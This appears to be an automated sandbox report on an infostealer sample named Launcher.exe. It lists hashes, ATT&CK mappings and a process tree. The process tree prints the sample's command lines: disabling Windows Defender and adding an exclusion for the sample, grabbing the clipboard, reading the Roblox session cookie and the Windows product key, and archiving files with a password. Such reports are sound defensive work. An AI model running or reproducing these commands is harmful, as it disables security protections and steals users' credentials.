Analysis
max time kernel: 147s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20/01/2025, 21:12
Behavioral task behavioral1
  Sample: Launcher.exe
  Resource: win7-20240903-en
Behavioral task behavioral2
  Sample: Launcher.exe
  Resource: win10v2004-20241007-en
General
Target: Launcher.exe
Size: 5.9MB
MD5: e632dad63d85e326f996d29455a73c5e
SHA1: b2790f28c60841c2cfd9334dc2b3d35a68965e56
SHA256: b3f3b2509384e16b578e69b3702074f91d76dd43dffc7f427072346d30900140
SHA512: 8e68cecd310c0a7a27076b2d6f53b9b578e641d46d554ebf5fca33baac2741d8a501cb2728cf7870dc7a42dac8a2077bf1103a3ef190efb880035aec8ba5247a
SSDEEP: 98304:+/De7pzfmyck8MMhJMjarCtaCObO/OH9KkqQz4W1kgeD2FMZi3+ML4eB:+SNzpqB6yA+KO0WRPiZkL4eB
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell
pid   Process
4124  powershell.exe
2060  powershell.exe
2340  powershell.exe
3176  powershell.exe
Drops file in Drivers directory 3 IoCs
description                   ioc                                     Process
File opened for modification  C:\Windows\System32\drivers\etc\hosts   attrib.exe
File opened for modification  C:\Windows\System32\drivers\etc\hosts   Launcher.exe
File opened for modification  C:\Windows\System32\drivers\etc\hosts   attrib.exe
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid   Process
4368  cmd.exe
4288  powershell.exe
Executes dropped EXE 1 IoCs
pid   Process
5036  rar.exe
Loads dropped DLL 17 IoCs
pid   Process
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
4120  Launcher.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
6     ip-api.com
18    ip-api.com
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid   Process
1608  tasklist.exe
2004  tasklist.exe
3816  tasklist.exe
2884  tasklist.exe
1832  tasklist.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid   Process
1056  WMIC.exe
3904  WMIC.exe
1688  WMIC.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid   Process
2696  systeminfo.exe
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid   Process
2060  powershell.exe
3176  powershell.exe
2060  powershell.exe
3176  powershell.exe
4288  powershell.exe
4288  powershell.exe
4288  powershell.exe
3740  powershell.exe
3740  powershell.exe
3740  powershell.exe
2340  powershell.exe
2340  powershell.exe
4532  powershell.exe
4532  powershell.exe
4124  powershell.exe
4124  powershell.exe
2308  powershell.exe
2308  powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Views/modifies file attributes 1 TTPs 2 IoCs
pid   Process
1532  attrib.exe
2672  attrib.exe
Processes
(the bracketed number is the depth of the process in the process tree; child processes are indented under their parent)

[1] C:\Users\Admin\AppData\Local\Temp\Launcher.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
    - Suspicious use of WriteProcessMemory
    PID: 1204
  [2] C:\Users\Admin\AppData\Local\Temp\Launcher.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
      - Drops file in Drivers directory
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID: 4120
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Launcher.exe'"
        - Suspicious use of WriteProcessMemory
        PID: 1916
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Launcher.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 3176
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        - Suspicious use of WriteProcessMemory
        PID: 2040
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2060
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        - Suspicious use of WriteProcessMemory
        PID: 2416
      [4] C:\Windows\system32\tasklist.exe
          Command line: tasklist /FO LIST
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken
          PID: 2004
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        - Suspicious use of WriteProcessMemory
        PID: 2988
      [4] C:\Windows\System32\Wbem\WMIC.exe
          Command line: wmic csproduct get uuid
          - Suspicious use of AdjustPrivilegeToken
          PID: 5020
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        - Suspicious use of WriteProcessMemory
        PID: 3056
      [4] C:\Windows\system32\reg.exe
          Command line: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          PID: 3780
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        - Suspicious use of WriteProcessMemory
        PID: 528
      [4] C:\Windows\system32\reg.exe
          Command line: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
          PID: 3776
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        - Suspicious use of WriteProcessMemory
        PID: 3292
      [4] C:\Windows\System32\Wbem\WMIC.exe
          Command line: wmic path win32_VideoController get name
          - Detects videocard installed
          - Suspicious use of AdjustPrivilegeToken
          PID: 1056
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        - Suspicious use of WriteProcessMemory
        PID: 2424
      [4] C:\Windows\System32\Wbem\WMIC.exe
          Command line: wmic path win32_VideoController get name
          - Detects videocard installed
          PID: 3904
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        - Suspicious use of WriteProcessMemory
        PID: 1724
      [4] C:\Windows\system32\tasklist.exe
          Command line: tasklist /FO LIST
          - Enumerates processes with tasklist
          PID: 3816
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        - Suspicious use of WriteProcessMemory
        PID: 3252
      [4] C:\Windows\system32\tasklist.exe
          Command line: tasklist /FO LIST
          - Enumerates processes with tasklist
          PID: 2884
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        - Suspicious use of WriteProcessMemory
        PID: 2212
      [4] C:\Windows\System32\Wbem\WMIC.exe
          Command line: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          PID: 2972
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        - Clipboard Data
        - Suspicious use of WriteProcessMemory
        PID: 4368
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell Get-Clipboard
          - Clipboard Data
          - Suspicious behavior: EnumeratesProcesses
          PID: 4288
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        - Suspicious use of WriteProcessMemory
        PID: 2896
      [4] C:\Windows\system32\tasklist.exe
          Command line: tasklist /FO LIST
          - Enumerates processes with tasklist
          PID: 1832
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
        - Suspicious use of WriteProcessMemory
        PID: 2404
      [4] C:\Windows\system32\tree.com
          Command line: tree /A /F
          PID: 1184
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "systeminfo"
        PID: 2596
      [4] C:\Windows\system32\systeminfo.exe
          Command line: systeminfo
          - Gathers system information
          PID: 2696
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        PID: 1536
      [4] C:\Windows\system32\reg.exe
          Command line: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
          PID: 3532
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
        PID: 1216
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
          - Suspicious behavior: EnumeratesProcesses
          PID: 3740
        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pl4tqos1\pl4tqos1.cmdline"
            PID: 1404
          [6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB0A3.tmp" "c:\Users\Admin\AppData\Local\Temp\pl4tqos1\CSC11694D424B41454E82C6E46F793AE164.TMP"
              PID: 1284
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
        PID: 2540
      [4] C:\Windows\system32\tree.com
          Command line: tree /A /F
          PID: 1916
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        PID: 4456
      [4] C:\Windows\system32\attrib.exe
          Command line: attrib -r C:\Windows\System32\drivers\etc\hosts
          - Drops file in Drivers directory
          - Views/modifies file attributes
          PID: 1532
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
        PID: 4720
      [4] C:\Windows\system32\tree.com
          Command line: tree /A /F
          PID: 3984
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        PID: 2660
      [4] C:\Windows\system32\attrib.exe
          Command line: attrib +r C:\Windows\System32\drivers\etc\hosts
          - Drops file in Drivers directory
          - Views/modifies file attributes
          PID: 2672
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
        PID: 452
      [4] C:\Windows\system32\tree.com
          Command line: tree /A /F
          PID: 1872
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        PID: 3772
      [4] C:\Windows\system32\tasklist.exe
          Command line: tasklist /FO LIST
          - Enumerates processes with tasklist
          PID: 1608
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
        PID: 868
      [4] C:\Windows\system32\tree.com
          Command line: tree /A /F
          PID: 2400
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
        PID: 1504
      [4] C:\Windows\system32\tree.com
          Command line: tree /A /F
          PID: 4348
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        PID: 4840
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          PID: 2340
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        PID: 5084
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          - Suspicious behavior: EnumeratesProcesses
          PID: 4532
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "getmac"
        PID: 1768
      [4] C:\Windows\system32\getmac.exe
          Command line: getmac
          PID: 3008
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI12042\rar.exe a -r -hp"90734242" "C:\Users\Admin\AppData\Local\Temp\v7TeD.zip" *"
        PID: 1928
      [4] C:\Users\Admin\AppData\Local\Temp\_MEI12042\rar.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\_MEI12042\rar.exe a -r -hp"90734242" "C:\Users\Admin\AppData\Local\Temp\v7TeD.zip" *
          - Executes dropped EXE
          PID: 5036
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        PID: 2012
      [4] C:\Windows\System32\Wbem\WMIC.exe
          Command line: wmic os get Caption
          PID: 1148
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        PID: 2096
      [4] C:\Windows\System32\Wbem\WMIC.exe
          Command line: wmic computersystem get totalphysicalmemory
          PID: 1480
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        PID: 1236
      [4] C:\Windows\System32\Wbem\WMIC.exe
          Command line: wmic csproduct get uuid
          PID: 4276
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        PID: 980
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          PID: 4124
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        PID: 3660
      [4] C:\Windows\System32\Wbem\WMIC.exe
          Command line: wmic path win32_VideoController get name
          - Detects videocard installed
          PID: 1688
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        PID: 1496
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
          - Suspicious behavior: EnumeratesProcesses
          PID: 2308
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
  Hide Artifacts (1)
    Hidden Files and Directories (1)
  Obfuscated Files or Information (1)
    Command Obfuscation (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (3)
    Credentials In Files (3)
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD57d7cafdbd4eb7942ce8a3beca4172f39
SHA11677ae68a1ce695ee07a86704590e8bad8da5a3d
SHA256bc000e927a6ad5053191d5ccb3d801fb480740ec6c32d154b7473ba9025fd563
SHA512c1c5e4205c03d9f67ee6016427fc3d59b31d757de38dc05fd6880965701ae1fb2eae8376bdeb4ac7da7d7706bc87668d96008c80fe6bc7e4d3725bd9b1020539
-
Filesize
450KB
MD5698c5cddce0d8d5e23fe2fab30d40c4e
SHA1c75f032a58ede9107908803b7deb80899f8e63f8
SHA256265ba8314fe1498c935a9fa4ea0094ac96d6a84a266abdc781bd3ec46cda9c8c
SHA512687688b8b41eaf31297a49f33a76af2b8e4ea485f78eeed84fc3f52ffcf5dd88f4a7bc34dbd2d0c0e9ea6315b8ccee7d199f3c7a714f1d7ce85384979e374c12
-
Filesize
258B
MD59a2baa34501023147a45dd33a6848567
SHA1fa2100fa9a8230b2e44d405ba9e02603039a4fb5
SHA25608a782026eb70bff3fc336d4de9526e161caeef9f5b8b47061e8b5b8f010f794
SHA512e2e3ea8b5274c6aa39c1b6e7d4ee0cb15660fbda7d8c00a5d9e6d31a63eae4cff4b2d044b2c0cad5ce5412827cbad02bafa9e8903854e9856374fc471af6aabe
-
Filesize
742B
MD53b2db52d9531412cb32b2eeb446a866f
SHA15e430aad40bd42e0985158ffb75fe87fa7efaa20
SHA25668fd95a7e1864f6da0aaec4223656fe8d3f549eff86d5c039d086e7b034c8f39
SHA51222d9258114a1e8b3eb4d11dd86b133e9140ff1a90b4cdf3befbf1ccb1b1b463c372009ea286587886434d162c119bfedbbeeb5583a0524250fa60d16ed08272c
-
Filesize
786B
MD5078261235f9a78daee3dfcc94ae0ffc2
SHA15c68958f8aa57fba62b249a0a0613c78104e0b86
SHA256251528330b06250683bf8b750f3094736a8a0b6cfb53695d66a0ae8bd1225aea
SHA51275a97af5f8b74d2770a330dfebb21569b41f41acaade6ef9c4b2e9d815e27ffc75b149e12cbd239c9f59c646cda027734725e5e076489ee9d7e781a27084e1da
-
Filesize
824B
MD5711f7443617351ea2e9a1f524214adb5
SHA125dcffa507b9965531630b9de26ce68671912841
SHA2566877df51dd9d3496b702e6899dd5f2bf7151564890d43d4573f72cff9ba46872
SHA512692f0fad2211fa90f10c1a7f3d0fb91bdd9edec99f18ca053c56a41099af088e61698cb9552b6f278fd430a8b66ffc9ed86631ed096124312467fe77f21bc72f
-
Filesize
631B
MD57cb69c43e2c6bd934d03c0b8b546f93d
SHA16d28fd004101eb32fc7a829afad6d70470f21406
SHA2560cfa229f7e4ef9e494144d3283124c8173acab66f325ca72a428d92a8b14920a
SHA5127442f949bef9e0bd2eeaa36fda1424943248648250426c12609cea399a5a52295062ae3c52d97c3cb31359912fd55aaf1574bfddcb7366fabd66cca769990e5a
-
Filesize
527B
MD51bc1ae72fa8324aebe77586696977dfc
SHA1900eb8cf766418fbcb193e788200a3d6c599ccbc
SHA256b06ca4a89e851246bbba41e616964a52d3ecc36e7d04fab486fc805567559408
SHA5121ef9c64982cd451071761594f579097200384921b4a163f591fef3abd7c5149d6ab2cf99d6f438fc47e53cfb951878f0dc44c42dc7f2104207e107561c280207
-
Filesize
30B
MD5e140e10b2b43ba6f978bee0aa90afaf7
SHA1bbbeb7097ffa9c2daa3206b3f212d3614749c620
SHA256c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618
SHA512df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f
-
Filesize
446KB
MD521dd1d9ccd16cbf92466523119fffb50
SHA143acc8cc4e5b0c353799467e3c3b2fd4e308e00b
SHA256888d5b7e68fb8e4677a9161fa457aae67f4aa89fb02702809984aca7456573a1
SHA512cc3aca74bb3f2f76933d9bbf106767fcba46bec1e313d8da2fa29f56b3f1ec5908c64927c3fdaa46f5d6ee701aa5cd4ea106c766c5704d03140c0cf1fcd84980
-
Filesize
232B
MD5a1ed7ae5eb9fc3e23869ad67e901bc07
SHA1a2d5a56acadb9ccdce1f897d9a0730f4df7c4990
SHA256778986c612daf3d2c25e8f6b68d7201ccccef533f39c7d38fc55a4944875c927
SHA512c1519b306fe2d5262ad1a43b54aa7f65f83a023aa890e5a3f180dc4a54ca1d4ee630207cb9a7d94555625552b35c06764b619f268b232455e973c7ad5cc066d2
-
Filesize
2KB
MD5a3fa41d0facb849bddd90f8363bf32c8
SHA17bd9f02745eeee55e7fb3d4f511c594d052a3d70
SHA2562353b26ed9dff4dac7381136ab5a4bdddaeda7687d2e35823c2eac865a5ac02f
SHA51277da8ff8e321afca5d0f0ec806a322a01afef2a8e553d3d47442ceb7e68e48c9b1ebee7796604411d3d0071ba72e13e5a378fa6f9b20c248e6a4146b8feec87c
-
Filesize
11KB
MD52783abbe4246b38ba934c3d0af52bfcf
SHA1915077b8b9829797163976df168f04a3a822e17b
SHA2568ee818aace189f1b4924967794d760126998d9bc7bddba1ac3d918e178889b11
SHA512c336e6892e4ff0c5b39556fdcec49ebc77c023f93bcb5416ce87145d587ab8f36f35a3beb9a029945cee10a6a80d6a22544f394d03e51d0acb950a9d4c819a1c
-
Filesize
2KB
MD5f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6
-
Filesize
652B
MD516bd7f54a8fe6146a47896dd878b00e3
SHA117ed06452c442a19fb3166fc1579a24e8c1f28fc
SHA2560eef2741e59e0197d975c531c4026fb3e0dcdf52dc9902a17d4946359d062732
SHA512199d5740b153ef1b6eebfa9e3129af8cdfcebbd0adebdfcd6b299c01eee3457930b648612aac1fd767962b46f7acc2b9eec17b0b27dfea9a48f54047e8373a4d
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD568c7cc3e7780b41becfee74cea876520
SHA1fa681f831161f888f3534ae8b0dd41eb3dd45fcc
SHA2567d07a725fe04cdbc13e083382e7c961fd9123d42fdb2efc1d1ac8be518d28734
SHA512df505bd0711c15c29d918142d9db50bb18e542403b91fd8af6f3cad31977761de2e05eae1d2e164cd91a30763993eb34a2bb4f4598813399399654922cff72ab